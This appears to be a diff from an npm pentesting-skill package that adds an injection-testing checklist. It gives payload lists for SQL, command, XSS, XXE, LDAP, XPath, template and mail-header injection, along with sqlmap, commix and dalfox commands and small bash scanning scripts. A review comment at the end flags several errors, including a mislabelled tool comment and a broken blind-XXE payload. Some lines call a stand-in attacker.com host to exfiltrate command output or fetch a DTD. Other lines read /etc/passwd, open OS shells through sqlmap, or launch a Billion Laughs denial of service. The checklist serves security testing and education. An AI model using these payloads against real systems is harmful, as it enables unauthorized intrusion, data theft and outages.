@soulofzephir/pi-skill-pentesting 1.0.0
- package/LICENSE +21 -0
- package/PUBLISH.md +97 -0
- package/README.md +255 -0
- package/package.json +39 -0
- package/skills/pentesting/SKILL.md +399 -0
- package/skills/pentesting/checklists/headers.md +286 -0
- package/skills/pentesting/checklists/injection.md +456 -0
- package/skills/pentesting/checklists/owasp.md +291 -0
- package/skills/pentesting/checklists/ports.md +323 -0
- package/skills/pentesting/reports/template.md +268 -0
- package/skills/pentesting/tools/generate-report.ps1 +327 -0
- package/skills/pentesting/tools/header-scan.ps1 +202 -0
- package/skills/pentesting/tools/header-scan.sh +173 -0
- package/skills/pentesting/tools/security-scan.ps1 +338 -0
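--- a/package/skills/pentesting/checklists/injection.md
+++ b/package/skills/pentesting/checklists/injection.md
@@ -0,0 +1,456 @@
+# Injection Testing Checklist
+
+## 🚨 Types of Injection
+
+| Type | Target | Risk |
+|------|--------|------|
+| SQL Injection | Database | Critical |
+| XSS | Users/Browser | High |
+| Command Injection | OS/Server | Critical |
+| LDAP Injection | Directory | High |
+| XML/XXE | XML Parser | High |
+| XPath Injection | XML Data | Medium |
+| IMAP Injection | Email Server | Medium |
+| ORM Injection | Framework | High |
+| Template Injection | Template Engine | Critical |
+| SSTI | Server Template | Critical |
+
+---
+
+## 💉 SQL Injection (SQLi)
+
+### Types to Test
+- [ ] In-Band SQLi (Union-based)
+- [ ] Blind Boolean-based SQLi
+- [ ] Time-based Blind SQLi
+- [ ] Out-of-Band SQLi
+- [ ] Error-based SQLi
+
+### Common Injection Points
+```
+URL parameters: /product?id=1' OR '1'='1
+POST body: username=' OR 1=1--
+Headers: Cookie: id=1'
+Search: q=test' UNION SELECT...
+API params: /api/users?id=1
+File params: avatar=' OR 1=1--
+```
+
+### Test Payloads
+
+**Basic Detection:**
+```
+'
+"
+`
+)
+))
+OR 1=1
+OR '1'='1
+OR 1=1--
+OR 1=1#
+OR '1'='1'--
+```
+
+**Union-Based:**
+```
+' UNION SELECT NULL--
+' UNION SELECT NULL,NULL--
+' UNION SELECT NULL,NULL,NULL--
+' UNION SELECT 1--
+' UNION SELECT 1,2,3--
+' UNION SELECT NULL,NULL FROM dual--
+```
+
+**Stacking:**
+```
+'; SELECT SLEEP(5);--
+'; WAITFOR DELAY '0:0:5';--
+```
+
+**Blind Boolean:**
+```
+' AND 1=1--
+' AND 1=2--
+' AND 'x'='x
+' AND 'x'='y
+' OR (SELECT COUNT(*) FROM users)>0--
+```
+
+**Time-Based:**
+```
+'; IF(1=1) WAITFOR DELAY '0:0:5'--
+'; SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END--
+'; pg_sleep(5)--
+'; BENCHMARK(5000000,MD5('A'))--
+```
+
+### Auto Tools
+```bash
+# SQLMap basic
+sqlmap -u "http://target.com/product?id=1" --batch
+
+# SQLMap with POST
+sqlmap -u "http://target.com/login" --data="username=admin&password=test"
+
+# SQLMap with cookies
+sqlmap -u "http://target.com/profile" --cookie="PHPSESSID=abc123"
+
+# SQLMap full enumeration
+sqlmap -u "http://target.com" --batch --level=5 --risk=3 --dbs
+
+# SQLMap shell
+sqlmap -u "http://target.com" --batch --os-shell
+```
+
+---
+
+## 🖥️ Command Injection
+
+### Test Payloads
+
+**Linux:**
+```bash
+; whoami
+; ls -la /
+; cat /etc/passwd
+; id
+; pwd
+; uname -a
+| whoami
+| cat /etc/passwd
+&& whoami
+`whoami`
+$(whoami)
+${IFS}cat${IFS}/etc/passwd
+|| whoami
+; ping -c 3 127.0.0.1
+```
+
+**Windows:**
+```cmd
+; whoami
+; dir c:\
+; type c:\windows\win.ini
+| whoami
+& whoami
+&& whoami
+|| whoami
+`whoami`
+```
+
+**Blind Command Injection:**
+```bash
+# Linux - time-based
+; sleep 5
+| sleep 5
+&& sleep 5
+|| sleep 5
+
+# Linux - out-of-band
+; nslookup $(whoami).attacker.com
+; curl http://attacker.com/$(whoami)
+
+# Windows - time-based
+; ping -n 5 127.0.0.1
+```
+
+### Common Injection Points
+```
+Search: ?q=test;ls
+Ping: ?host=127.0.0.1;cat /etc/passwd
+DNS: ?domain=example.com;id
+Email: ?to=test@x.com|id
+File: ?file=report.pdf;whoami
+URL: /redirect?url=http://evil.com
+```
+
+### Auto Tools
+```bash
+# Commix
+commix -u "http://target.com/ping?ip=127.0.0.1"
+
+# SQLMap command injection mode
+sqlmap -u "http://target.com" --os-cmd="whoami"
+
+# Manual
+# Try: 127.0.0.1;ls
+# Try: 127.0.0.1|ls
+# Try: 127.0.0.1&&ls
+# Try: 127.0.0.1`ls`
+# Try: 127.0.0.1$(ls)
+```
+
+---
+
+## 🐙 XSS (Cross-Site Scripting)
+
+### Types
+- [ ] Reflected XSS
+- [ ] Stored/Persistent XSS
+- [ ] DOM-based XSS
+- [ ] Self-XSS
+- [ ] Blind XSS (PolyChain)
+
+### Test Payloads
+
+**Basic:**
+```html
+<script>alert(1)</script>
+<img src=x onerror=alert(1)>
+<svg onload=alert(1)>
+<body onload=alert(1)>
+<input onfocus=alert(1) autofocus>
+<select onfocus=alert(1) autofocus>
+<iframe src="javascript:alert(1)">
+<video><source onerror="alert(1)">
+<audio src=x onerror=alert(1)>
+<details open ontoggle=alert(1)>
+<marquee onstart=alert(1)>
+```
+
+**Event Handlers:**
+```html
+onload, onerror, onclick
+onmouseover, onmouseout
+onfocus, onblur
+onchange, onsubmit
+onkeydown, onkeyup, onkeypress
+ondblclick, ondrag
+```
+
+**WAF Bypass:**
+```html
+<SCRIPT>alert(1)</SCRIPT>
+<scrIPT>alert(1)</scrIPT>
+<ScRiPt>alert(1)</sCrIpT>
+<img src="x" onerror="alert(1)">
+<svg><script>alert(1)</script></svg>
+<svg><g/onload=alert(1)>
+<svg><script>eval('alert(1)')</script></svg>
+<iframe src="javascript:alert(1)">
+<img src=x:alert(1)>
+<object data="data:text/html,<script>alert(1)</script>">
+```
+
+**Polyglots:**
+```html
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e
+--></title></textarea></style></script></xmp>><svg/onload=alert(1)//
+'">><marquee><img src=x onerror=alert(1)>
+```
+
+**DOM XSS:**
+```javascript
+location.href="javascript:alert(1)"
+document.write("<img src=x onerror=alert(1)>")
+eval("alert(1)")
+setTimeout("alert(1)")
+setInterval("alert(1)")
+innerHTML="<img src=x onerror=alert(1)>"
+```
+
+### Common Injection Points
+```
+URL params: /search?q=<script>
+Form input: name=<script>
+Comment: <img src=x onerror=>
+Profile: bio=<svg onload=>
+Chat: message=<script>
+Email: subject=<script>
+```
+
+### Auto Tools
+```bash
+# Dalfox (XSS scanner)
+dalfox url "http://target.com/search?q=test"
+
+# XSStrike
+xsstrike -u "http://target.com/?q=test"
+
+# Nuclei XSS templates
+nmap --script=http-unsafe-output-escaping,http-cross-site-scripting target.com
+
+# Manual browser testing required for DOM XSS
+```
+
+---
+
+## 📁 LDAP Injection
+
+### Test Payloads
+```
+*)(objectClass=*
+)(objectClass=*
+*)(objectClass=*
+admin)(&(password=*)
+*)(|
+)(CN=Admin)
+*()
+```
+
+### Common Points
+```
+Login: username=admin*)(&
+Search: ?search=admin*
+```
+
+---
+
+## 📄 XML/XXE Injection
+
+### Test Payloads
+
+**Basic XXE:**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
+<foo>&xxe;</foo>
+```
+
+**Blind XXE:**
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">]>
+<foo>&xxe;</foo>
+
+<!-- evil.dtd on attacker.com -->
+<!ENTITY xxe SYSTEM "file:///etc/passwd">
+```
+
+**Billion Laughs (DoS):**
+```xml
+<!DOCTYPE lolz [
+<!ENTITY lol "lol">
+<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+]>
+<lolz>&lol3;</lolz>
+```
+
+### Common Points
+```
+XML API: /api/import
+SOAP API: /soap
+PDF upload
+Office docs upload
+RSS feed
+```
+
+---
+
+## 🔍 XPath Injection
+
+### Test Payloads
+```
+' or '1'='1
+' or ''='
+admin' or '1'='1
+admin' or ''='
+' or count(/*) > 0
+' or count(/child::node()) > 0
+```
+
+---
+
+## 🗂️ Template Injection (SSTI)
+
+### Jinja2 (Python)
+```python
+{{7*7}}
+{{config}}
+{{config.items()}}
+{{''.__class__.__mro__[1].__subclasses__()}}
+{{lipsum.__globals__.__builtins__}}
+{{cycler.__init__.__globals__.os.system('id')}}
+```
+
+### Twig (PHP)
+```php
+{{7*7}}
+{{_self.env.setCache("blabla")}}
+{{_self.env.getLoader().getPaths()}}
+{{_self.env.getLoader().getPaths()|escape}}
+```
+
+### Handlebars (Node.js)
+```javascript
+{{#with "a"}}{{#with "b"}}{{#with "c"}}{{#with "d"}}{{#with (eval "require('child_process').execSync('id')")}}{{this}}{{/with}}{{/with}}{{/with}}{{/with}}{{/with}}
+```
+
+---
+
+## 📧 IMAP/SMTP Injection
+
+### Test Payloads
+```
+user@domain.com%0ACc:attacker@evil.com
+user@domain.com%0ATo:attacker@evil.com
+user@domain.com%0ASubject:Phishing
+user@domain.com\r\n\r\nPhishing body
+```
+
+---
+
+## 🛡️ Injection Prevention Checklist
+
+- [ ] Input validation (whitelist)
+- [ ] Parameterized queries (prepared statements)
+- [ ] Output encoding/escaping
+- [ ] Content Security Policy
+- [ ] ORM usage (not raw SQL)
+- [ ] No eval() on user input
+- [ ] XML parser secure config
+- [ ] Command execution sandboxed
+- [ ] WAF rules for common payloads
+- [ ] Regular security testing
+
+---
+
+## ⚡ Quick Test Scripts
+
+### SQLi Quick Check
+```bash
+#!/bin/bash
+TARGET=$1
+echo "Testing SQLi on: $TARGET"
+
+# Basic test
+PAYLOADS=("'" "' OR '1'='1" "' OR 1=1--" "' UNION SELECT NULL--")
+
+for p in "${PAYLOADS[@]}"; do
+RESPONSE=$(curl -s "${TARGET}${p}" | grep -iE "sql|syntax|mysql|postgresql|error|warning|mysql_fetch")
+if [ ! -z "$RESPONSE" ]; then
+echo "⚠️ VULNERABLE with payload: $p"
+echo " Response: $RESPONSE"
+fi
+done
+```
+
+### XSS Quick Check
+```bash
+#!/bin/bash
+TARGET=$1
+PAYLOAD="<script>alert('XSS')</script>"
+
+echo "Testing XSS on: $TARGET"
+curl -s "${TARGET}${PAYLOAD}" | grep -q "alert" && echo "⚠️ Reflected XSS possible"
+
+# Also test with different encoding
+PAYLOAD2="<img src=x onerror=alert(1)>"
+curl -s "${TARGET}${PAYLOAD2}" | grep -q "alert" && echo "⚠️ Event handler XSS"
+```
+
+---
+
+## 📊 Injection Risk Matrix
+
+| Type | Difficulty to Exploit | Impact | Prevalence |
+|------|----------------------|--------|------------|
+| SQLi | Medium | Critical | Common |
+| Command Injection | Easy | Critical | Common |
+| XSS | Easy | High | Very Common |
+| XXE | Medium | High | Common |
+| LDAP Injection | Medium | High | Less Common |
+| SSTI | Medium | Critical | Less Common |
+| XPath | Medium | Medium | Less Common |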
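Review bot: The XSS Quick Check (new-file lines 437 and 441) greps the response for the bare word `alert`, so a page that correctly HTML-encodes the reflection (`&lt;script&gt;alert(...)`) — or that simply contains that word anywhere — is still reported as "Reflected XSS possible"; match the full unescaped payload instead, `grep -qF -- "$PAYLOAD"`, and percent-encode it on the way out (e.g. `curl -s -G "$TARGET" --data-urlencode "q=$PAYLOAD"`), because `${TARGET}${PAYLOAD}` sends raw `<`, spaces and quotes that many servers reject before the parameter is ever reflected. The SQLi Quick Check has the same shape: `grep -iE "sql|syntax|...|error|warning"` fires on any page that mentions "error", so the "VULNERABLE" label should read "possible (confirm manually or with sqlmap)" rather than assert a finding. Two content slips are worth fixing in the same pass: the `# Nuclei XSS templates` comment sits above an `nmap --script=...` command, and the Blind XXE payload declares a parameter entity (`<!ENTITY % xxe ...>`) but only references `&xxe;`, so the external DTD is never fetched — it needs `%xxe;` inside the DOCTYPE, and the shown `evil.dtd` needs an exfiltration entity to actually return data. Finally, `sqlmap --risk=3`, `--os-shell`, `--os-cmd` and the Billion Laughs payload can modify data, execute commands or take the target down, so the Auto Tools and XXE sections should carry a one-line "only with explicit written scope authorization" caveat.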